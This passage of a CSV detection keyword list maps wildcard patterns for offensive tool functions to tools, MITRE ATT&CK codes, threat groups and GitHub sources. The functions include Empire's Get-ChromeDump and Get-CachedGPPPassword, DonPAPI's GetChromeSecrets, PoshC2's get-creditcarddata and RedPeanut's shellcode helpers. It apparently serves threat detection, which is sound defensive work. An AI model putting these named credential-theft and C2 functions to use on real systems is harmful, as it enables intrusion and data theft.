T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*GetBearerToken.exe https://*.sharepoint.com*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*Get-BloodHoundData*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BootKey*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BrowserData.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-BrowserInformation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetC2Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CachedGPPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-CachedRDPConnection*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-CachedRDPConnection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*getcap -r / 2>*,greyware_tool_keyword,getcap,recursively scans all the files starting from the root directory / and lists files with capabilities set,T1082 - T1007,TA0007 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,6,8,N/A,N/A,N/A,N/A -*getcap -r / 2>/dev/null*,greyware_tool_keyword,Getcap,Enumerating File Capabilities with Getcap,T1046 - T1083,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Get-ChromeBookmarks*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetChromeSecrets*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*GETCLIPBOARD*GETLOCALGROUP*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Get-ClipboardContents*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ClipboardContents.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-CompressedAgent*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedAgent.ps1*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedShellcode*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedShellcode.ps1*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-ComputerDetails*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*GetComputersFromActiveDirectory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-creditcarddata *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-CredPersist*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*getCrossC2Beacon*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z 